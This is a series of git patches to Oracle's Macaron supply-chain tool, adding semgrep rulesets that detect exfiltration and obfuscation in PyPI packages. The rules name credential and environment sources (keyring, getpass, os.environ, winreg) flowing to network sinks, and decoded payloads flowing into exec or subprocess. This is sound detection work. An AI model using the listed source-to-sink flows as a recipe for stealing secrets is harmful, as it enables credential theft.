absolute path. + + Parameters + ---------- + path: str + The absolute or relative to package_sourcecode_path file path to open. + + Returns + ------- + bytes + The raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded, or there is an error accessing the file. 
+ """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + if not os.path.isabs(path): + path = os.path.join(self.package_sourcecode_path, path) + + if not os.path.exists(path): + error_msg = f"Unable to locate file {path}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + try: + with open(path, "rb") as file: + return file.read() + except OSError as read_error: + error_msg = f"Unable to read file {path}: {read_error}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) from read_error + + def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: + """ + Iterate through all source code files. + + Returns + ------- + tuple[str, bytes] + The source code file path, and the the raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + for root, _directories, files in os.walk(self.package_sourcecode_path): + for file in files: + if root == ".": + root_path = os.getcwd() + os.linesep + else: + root_path = root + filepath = os.path.join(root_path, file) + + with open(filepath, "rb") as handle: + contents = handle.read() + + yield filepath, contents From beda14d26ffe852d1a929e7cf0492ae2f68f62bc Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 30 Jan 2025 15:09:39 +1000 Subject: [PATCH 05/37] feat: support for semgrep rules, currently two implemented, with custom options --- src/macaron/config/defaults.ini | 6 +- .../sourcecode/pypi_sourcecode_analyzer.py | 130 +++------ .../pypi_malware_rules/exfiltration.yaml | 146 ++++++++++ .../pypi_malware_rules/obfuscation.yaml | 256 ++++++++++++++++++ .../package_registry/pypi_registry.py | 2 +- 5 files changed, 441 insertions(+), 99 deletions(-) create mode 100644 
src/macaron/resources/pypi_malware_rules/exfiltration.yaml create mode 100644 src/macaron/resources/pypi_malware_rules/obfuscation.yaml diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index acae98d55..41df6ca92 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -601,6 +601,6 @@ epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 -# yaml configuration file containing suspicious patterns. Can be full path or relative to -# folder where macaron is installed. This will be normalised to the OS path type. -suspicious_patterns_file = src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml +# absolute path to where a custom set of semgrep rules for source code analysis are stored. These will be included +# with Macaron's default rules. The path will be normalised to the OS path type. +custom_semgrep_rules = diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index d372c4fd3..beb5e553b 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -18,11 +18,9 @@ import subprocess # nosec import tempfile from collections import defaultdict -from typing import Any - -import yaml from macaron.config.defaults import defaults +from macaron.config.global_config import global_config from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult @@ -58,79 +56,61 @@ class PyPISourcecodeAnalyzer: def __init__(self) -> None: """Collect required data for analysing the source code.""" - self.suspicious_patterns = 
self._load_defaults() - self.rule_files: list = [] + self.default_rule_path, self.custom_rule_path = self._load_defaults() + + def _load_defaults(self) -> tuple[str, str | None]: + """ + Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. - def _load_defaults(self) -> dict[str, dict[str, list]]: - """Load the suspicious pattern from suspicious_pattern.yaml. + Semgrep validation is run on the custom rules provided by the user. Returns ------- - dict[str: dict[str, list]] - The suspicious pattern. + tuple[str, str | None] + The default rule path and the custom rule path or None if one was not provided Raises ------ ConfigurationError - if the suspicious pattern file is not in the expected format or cannot be accessed. + If the heuristic.pypi entry is not present, or if the semgrep validation of the custom rule path failed. """ - suspicious_patterns: dict[str, dict[str, list]] = {} + default_rule_path = os.path.join(global_config.resources_path, "pypi_malware_rules") section_name = "heuristic.pypi" if defaults.has_section(section_name): section = defaults[section_name] else: - error_msg = f"Unable to find section {section_name}, which is required to load suspicious patterns." + error_msg = f"Unable to find section {section_name}, which must be present." logger.debug(error_msg) raise ConfigurationError(error_msg) - configuration_name = "suspicious_patterns_file" - filename = section.get(configuration_name) - if filename is None: - error_msg = f"Unable to find {configuration_name} in configuration file." + configuration_name = "custom_semgrep_rules" + custom_rule_path = section.get(configuration_name) + if not custom_rule_path: # i.e. 
None or empty string + logger.debug("No custom path listed under %s, using default rules only.", configuration_name) + return default_rule_path, None + + custom_rule_path = os.path.normpath(custom_rule_path) + if not os.path.exists(custom_rule_path): + error_msg = f"Unable to locate path {custom_rule_path}" logger.debug(error_msg) raise ConfigurationError(error_msg) - filename = os.path.normpath(filename) + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--config", custom_rule_path] try: - with open(filename, encoding="utf-8") as file: - configured_patterns: dict[str, JsonType] = yaml.safe_load(file) - except FileNotFoundError as file_error: - error_msg = f"Unable to locate {filename}" - logger.debug(error_msg) - raise ConfigurationError(error_msg) from file_error - except yaml.YAMLError as yaml_error: - error_msg = f"Unable to parse {filename} as a yaml file." + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = f"Unable to run semgrep validation on {custom_rule_path} with arguments {semgrep_commands}: {semgrep_error}" logger.debug(error_msg) - raise ConfigurationError(error_msg) from yaml_error + raise ConfigurationError(error_msg) from semgrep_error - for expected_category in self.EXPECTED_PATTERN_CATEGORIES: - if expected_category not in configured_patterns: - error_msg = ( - f"Expected suspicious pattern category {expected_category} present in" - + f" {filename}: must have categories {self.EXPECTED_PATTERN_CATEGORIES}" - ) - logger.debug(error_msg) - raise ConfigurationError(error_msg) - - for category, patterns in configured_patterns.items(): - suspicious_patterns[category] = {} - if isinstance(patterns, list): - suspicious_patterns[category][category] = patterns - elif isinstance(patterns, dict): - for subcategory, subpatterns in patterns.items(): - if not isinstance(subpatterns, list): - error_msg = f"Expected 
subcategory {subcategory} items to be" + f" a list in {filename}" - logger.debug(error_msg) - raise ConfigurationError(error_msg) - - suspicious_patterns[category][subcategory] = subpatterns - else: - error_msg = f"Expected category {category} to be either a list" + f" or dictionary in {filename}" - logger.debug(error_msg) - raise ConfigurationError(error_msg) + if process.returncode != 0: + error_msg = f"Error running semgrep validation on {custom_rule_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) - return suspicious_patterns + logger.debug("Including custom ruleset from %s.", custom_rule_path) + return default_rule_path, custom_rule_path def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package for malicious patterns. @@ -162,9 +142,9 @@ def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu logger.debug(error_msg) raise HeuristicAnalyzerValueError(error_msg) - self._create_rules() - for rule_file in self.rule_files: - semgrep_commands.extend(["--config", rule_file.name]) + semgrep_commands.extend(["--config", self.default_rule_path]) + if self.custom_rule_path: + semgrep_commands.extend(["--config", self.custom_rule_path]) semgrep_commands.append(source_code_path) with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: @@ -203,8 +183,6 @@ def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu end = json_extract(finding, ["end", "line"], int) analysis_result[category].append({"file": file, "start": start, "end": end}) - self._clear_rules() - return result, dict(analysis_result) def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: @@ -258,44 +236,6 @@ def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu return result, analysis_result - def 
_create_rules(self) -> None: - rule_list: list[dict[str, Any]] = [] - contents: dict = {} - - if self.rule_files: - self._clear_rules() - - # import rules - for category, patterns in self.suspicious_patterns[IMPORTS].items(): - rule: dict[str, Any] = {} - pattern_list: list = [] - - rule["id"] = category - rule["severity"] = "ERROR" - rule["languages"] = ["python"] - rule["message"] = f"Detected suspicious imports from the '{category}' category" - - for pattern in patterns: - pattern_list.append({"pattern": f"import {pattern}"}) - pattern_list.append({"pattern": f"from {pattern} import $X"}) - pattern_list.append({"pattern": f'__import__("{pattern}")'}) - - rule["pattern-either"] = pattern_list - rule_list.append(rule) - - contents = {"rules": rule_list} - - with tempfile.NamedTemporaryFile( - "w", prefix=f"{IMPORTS}_", suffix=".yaml", delete=False - ) as import_patterns_file: - yaml.dump(contents, import_patterns_file) - self.rule_files.append(import_patterns_file) - - def _clear_rules(self) -> None: - for file in self.rule_files: - file.close() - self.rule_files.clear() - class DataFlowTracer(ast.NodeVisitor): """The class is used to create the symbol table and analyze the dataflow.""" diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml new file mode 100644 index 000000000..b0c8b078a --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -0,0 +1,146 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: remote-exfiltration + metadata: + description: Detected the exfiltration of data to a remote endpoint + message: Detected exfiltration of sensitive data to a remote endpoint. 
+ languages: + - python + severity: ERROR + mode: taint + options: + symbolic_propagation: true + pattern-sources: + - pattern-either: + # result of code/command evaluation + - pattern: exec(...) + - pattern: eval(...) + - pattern: ast.literal_eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # environment variables + - pattern: os.environ + - pattern: os.environ[...] + - pattern: os.environ.get(...) + - pattern: os.environb + - pattern: os.environb[...] + - pattern: os.environb.get(...) + - pattern: os.getenv(...) + - pattern: os.getenvb(...) + + # system information + - pattern: os.uname(...) + - pattern: os.confstr(...) + - pattern: os.confstr_names + - pattern: os.sysconf(...) + - pattern: os.sysconf_names + - pattern: platform.release(...) + - pattern: platform.version(...) + - pattern: platform.uname(...) + - pattern: platform.win32_ver(...) + - pattern: platform.win32_edition(...) + - pattern: platform.win32_is_iot(...) + - pattern: platform.mac_ver(...) + - pattern: platform.ios_ver(...) + - pattern: platform.libc_ver(...) + - pattern: platform.freedesktop_os_release(...) + - pattern: platform.android_ver(...) + + # network information + - pattern: psutil.net_connections(...) + - pattern: psutil.net_if_addrs(...) + - pattern: psutil.net_if_stats(...) + - pattern: platform.node(...) + - pattern: platform.platform(...) + - pattern: socket.gethostname(...) + - pattern: socket.gethostbyname(...) + - pattern: socket.gethostbyname_ex(...) + - pattern: socket.getfqdn(...) + - pattern: socket.if_nameindex(...) + + # user information + - pattern: psutil.users(...) + + # sensitive information + - pattern: getpass.getpass(...) + - pattern: getpass.unix_getpass(...) + - pattern: getpass.win_getpass(...) + - pattern: getpass.getuser(...) + - pattern: pwd.getpwuid(...) + - pattern: pwd.getpwnam(...) + - pattern: pwd.getpwall(...) 
+ - pattern: keyring.get_keyring(...) + - pattern: keyring.get_password(...) + - pattern: keyring.get_credential(...) + - pattern: winreg.ConnectRegistry(...) + - pattern: winreg.LoadKey(...) + - pattern: winreg.OpenKey(...) + - pattern: winreg.OpenKeyEx(...) + - pattern: winreg.QueryInfoKey(...) + - pattern: winreg.QueryValue(...) + - pattern: winreg.QueryValueEx(...) + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - pattern: socket.socket(...) + - pattern: $SOC.accept(...) + - pattern: $SOC.bind(...) + - pattern: $SOC.connect(...) + - pattern: $SOC.connect_ex(...) + - pattern: $SOC.listen(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.send(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.Session(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.request(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.ConnectionPool(...) + - pattern: urllib3.ProxyManager(...) + - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using urlrequest module + - pattern: UrlRequest(...) + - pattern: UrlRequestRequests(...) + - pattern: UrlRequestUrllib(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) 
+ - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncHTTPTransport(...) + - pattern: httpx.Client(...) + - pattern: httpx.Request(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml new file mode 100644 index 000000000..5f3bf329c --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -0,0 +1,256 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: default-assigning + metadata: + description: Identifies when a default python function is assigned to another variable + message: Found an instance of assigning a builtin python function to a variable + languages: + - python + severity: ERROR + pattern-either: + # assigning, many obfuscation tools listed below do this + - pattern: $VAR = __import__ + - pattern: $VAR = getattr + - pattern: $VAR = bytes + - pattern: $VAR = bytearray + - pattern: $VAR = exec + - pattern: $VAR = eval + - pattern: $VAR = setattr + - pattern: $VAR = compile + - pattern: $VAR = map + - pattern: $VAR = open + - pattern: $VAR = zip + - pattern: $VAR = vars + - pattern: $VAR = dir + # doing the same using the builtins module + - pattern: $VAR = builtins.__import__ + - pattern: $VAR = builtins.getattr + - pattern: $VAR = builtins.bytes + - pattern: $VAR = builtins.bytearray + - pattern: $VAR = builtins.exec + - pattern: $VAR = builtins.eval + - pattern: $VAR = builtins.setattr + - pattern: $VAR = builtins.compile + - pattern: $VAR = builtins.map + - pattern: $VAR = builtins.open + - pattern: $VAR = builtins.zip + - pattern: $VAR = builtins.vars + - pattern: $VAR = builtins.dir + - pattern: $VAR = __import__('builtins').__import__ + - pattern: $VAR = 
__import__('builtins').getattr + - pattern: $VAR = __import__('builtins').bytes + - pattern: $VAR = __import__('builtins').bytearray + - pattern: $VAR = __import__('builtins').exec + - pattern: $VAR = __import__('builtins').eval + - pattern: $VAR = __import__('builtins').setattr + - pattern: $VAR = __import__('builtins').compile + - pattern: $VAR = __import__('builtins').builtins.map + - pattern: $VAR = __import__('builtins').open + - pattern: $VAR = __import__('builtins').zip + - pattern: $VAR = __import__('builtins').vars + - pattern: $VAR = __import__('builtins').dir + +- id: obfuscation-tools + metadata: + description: detects the use of python obfuscation packages on the source code + message: Found an instance of import and/or using python obfuscation tools + languages: + - python + severity: ERROR + pattern-either: + # pyarmor: pyarmor.readthedocs.io/en/latest/index.html + - pattern: import __pyarmor__ + - pattern: from $MODULE import __pyarmor__ + - pattern: from $MODULE import pyarmor_runtime + - pattern: __import__('__pyarmor__') + # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern: __assert_armored__($PAYLOAD) + - patterns: + - pattern: | + def $FUNC_NAME(...): + ... + - metavariable-regex: + metavariable: $FUNC_NAME + regex: ^pyarmor__\d+$ + # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern-regex: ^# pyarmor:.? + # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 + - patterns: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... + - metavariable-regex: + metavariable: $OBF + regex: (^_?[Oo0]|[1Il]+$) + # obfuscated using pyobfuscate.com + - pattern: pyobfuscate=... + # obfuscated using liftoff.github.io/pyminifier + - pattern: import mystificate + +- id: inline-imports + metadata: + description: detects the use of the private inline import __import__(...) 
+ message: detected use of inline imports + languages: + - python + severity: ERROR + pattern: __import__($MODULE) + +- id: decode-and-execute + metadata: + description: detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes + message: detected the flow of a decoded string value to a remote endpoint, process, code evaluation, or file write + languages: + - python + severity: ERROR + mode: taint + options: + symbolic_propagation: true + pattern-sources: + - pattern-either: + # marshal encryption + - pattern: marshal.loads(...) + - pattern: __import__('marshal').loads(...) + # bytes decoding + - pattern: | + "...".decode(...) + - pattern: $BYTES.decode(...) + - pattern: bytes.decode(...) + - pattern: $BYTES.join(...).decode() + # decompression + - pattern: zlib.decompress(...) + - pattern: __import__('zlib').decompress(...) + # base64 decoded string values + - pattern: base64.b64decode(...) + - pattern: __import__('base64').decode(...) + - pattern: b64decode(...) + # hex encoded values + - pattern: bytes.fromhex(...) + # unicode construction + - patterns: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - metavariable-regex: + metavariable: $FOO + regex: unicode|unichr|chr|ord + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - pattern: socket.socket(...) + - pattern: $SOC.accept(...) + - pattern: $SOC.bind(...) + - pattern: $SOC.connect(...) + - pattern: $SOC.connect_ex(...) + - pattern: $SOC.listen(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.send(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) 
+ - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.Session(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.request(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.ConnectionPool(...) + - pattern: urllib3.ProxyManager(...) + - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using urlrequest module + - pattern: UrlRequest(...) + - pattern: UrlRequestRequests(...) + - pattern: UrlRequestUrllib(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncHTTPTransport(...) + - pattern: httpx.Client(...) + - pattern: httpx.Request(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) 
+ - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # code evaluation/execution + - pattern: exec(...) + - pattern: eval(...) + - pattern: ast.literal_eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # file write + - pattern: $FILE.write(...) + - pattern: $MODULE.dumps(...) + - pattern: os.write(...) + - pattern: os.writev(...) + - pattern: os.pwrite(...) + - pattern: os.pwritev(...) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 4fa5d1855..f3d349d8f 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -246,7 +246,7 @@ def download_package_sourcecode(self, url: str) -> str: raise InvalidHTTPResponseError(error_msg) from read_error extracted_dir = os.listdir(temp_dir) - if len(extracted_dir) == 1 and re.sub(".tar.gz$", "", file_name) == extracted_dir[0]: + if len(extracted_dir) == 1 and package_name == extracted_dir[0]: # structure used package name and version as top-level directory temp_dir = os.path.join(temp_dir, extracted_dir[0]) From ea5a5f74dfd6194d29e466068890b08c7a362f77 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 3 Feb 2025 11:05:56 +1000 Subject: [PATCH 06/37] test: setup test environment for source code analyzer --- .pre-commit-config.yaml | 2 + .semgrepignore | 1 + pyproject.toml | 11 +- .../sourcecode/pypi_sourcecode_analyzer.py | 18 +- 
.../pypi_malware_rules/exfiltration.yaml | 52 ++- .../pypi_malware_rules/obfuscation.yaml | 34 +- .../checks/detect_malicious_metadata_check.py | 2 +- .../obfuscation/decode_and_execute.py | 26 ++ .../obfuscation/default_assigning.py | 61 +++ .../obfuscation/expected_results.json | 405 ++++++++++++++++++ .../sourcecode_samples/obfuscation/tools.py | 69 +++ .../pypi/test_pypi_sourcecode_analyzer.py | 54 +++ 12 files changed, 703 insertions(+), 32 deletions(-) create mode 100644 .semgrepignore create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py create mode 100644 tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index bc55cb969..94f2d2625 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -65,6 +65,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: [flake8-bugbear==22.10.27, flake8-builtins==2.0.1, flake8-comprehensions==3.10.1, flake8-docstrings==1.6.0, flake8-mutable==1.2.0, flake8-noqa==1.4.0, flake8-pytest-style==1.6.0, flake8-rst-docstrings==0.3.0, pep8-naming==0.13.2] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--config, .flake8] # Check GitHub Actions workflow files. @@ -94,6 +95,7 @@ repos: language: python files: ^src/macaron/|^tests/ types: [text, python] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--show-traceback, --config-file, pyproject.toml] # Check for potential security issues. 
diff --git a/.semgrepignore b/.semgrepignore new file mode 100644 index 000000000..3d53fd964 --- /dev/null +++ b/.semgrepignore @@ -0,0 +1 @@ +# Items added to this file will be ignored by Semgrep. diff --git a/pyproject.toml b/pyproject.toml index fa86bf95e..86f57c285 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -123,12 +123,14 @@ Issues = "https://github.com/oracle/macaron/issues" [tool.bandit] tests = [] skips = ["B101"] - +exclude_dirs = ['tests/malware_analyzer/pypi/resources/sourcecode_samples'] # https://github.com/psf/black#configuration [tool.black] line-length = 120 - +force-exclude = ''' +tests/malware_analyzer/pypi/resources/sourcecode_samples/ +''' # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ @@ -174,7 +176,6 @@ exclude = [ "SECURITY.md", ] - # https://pycqa.github.io/isort/ [tool.isort] profile = "black" @@ -185,7 +186,6 @@ skip_gitignore = true # https://mypy.readthedocs.io/en/stable/config_file.html#using-a-pyproject-toml [tool.mypy] -# exclude= show_error_codes = true show_column_numbers = true check_untyped_defs = true @@ -213,7 +213,6 @@ module = [ ] ignore_missing_imports = true - # https://pylint.pycqa.org/en/latest/user_guide/configuration/index.html [tool.pylint.MASTER] fail-under = 10.0 @@ -244,6 +243,7 @@ disable = [ "too-many-statements", "duplicate-code", ] +ignore-paths = "tests/malware_analyzer/pypi/resources/sourcecode_samples" [tool.pylint.MISCELLANEOUS] notes = [ @@ -265,6 +265,7 @@ addopts = """-vv -ra --tb native \ --doctest-modules --doctest-continue-on-failure --doctest-glob '*.rst' \ --cov macaron \ --ignore tests/integration \ + --ignore tests/malware_analyzer/pypi/resources/sourcecode_samples \ """ # Consider adding --pdb # https://docs.python.org/3/library/doctest.html#option-flags doctest_optionflags = "IGNORE_EXCEPTION_DETAIL" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py 
b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index beb5e553b..e3c325690 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -54,11 +54,11 @@ class PyPISourcecodeAnalyzer: EXPECTED_PATTERN_CATEGORIES = [IMPORTS, CONSTANTS, CALLS] - def __init__(self) -> None: + def __init__(self, resources_path: str = global_config.resources_path) -> None: """Collect required data for analysing the source code.""" - self.default_rule_path, self.custom_rule_path = self._load_defaults() + self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) - def _load_defaults(self) -> tuple[str, str | None]: + def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: """ Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. @@ -72,9 +72,15 @@ def _load_defaults(self) -> tuple[str, str | None]: Raises ------ ConfigurationError - If the heuristic.pypi entry is not present, or if the semgrep validation of the custom rule path failed. + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. 
""" - default_rule_path = os.path.join(global_config.resources_path, "pypi_malware_rules") + default_rule_path = os.path.join(resources_path, "pypi_malware_rules") + if not os.path.exists(default_rule_path): + error_msg = f"Error with locating default rule path {default_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + section_name = "heuristic.pypi" if defaults.has_section(section_name): @@ -112,7 +118,7 @@ def _load_defaults(self) -> tuple[str, str | None]: logger.debug("Including custom ruleset from %s.", custom_rule_path) return default_rule_path, custom_rule_path - def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package for malicious patterns. This is the first phase of the source code analyzer. diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index b0c8b078a..fa96f43d3 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -4,7 +4,7 @@ rules: - id: remote-exfiltration metadata: - description: Detected the exfiltration of data to a remote endpoint + description: Identifies the flow of sensitive information to a remote endpoint. message: Detected exfiltration of sensitive data to a remote endpoint. languages: - python @@ -23,6 +23,43 @@ rules: - pattern: __import__('builtins').exec(...) - pattern: __import__('builtins').eval(...) + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) 
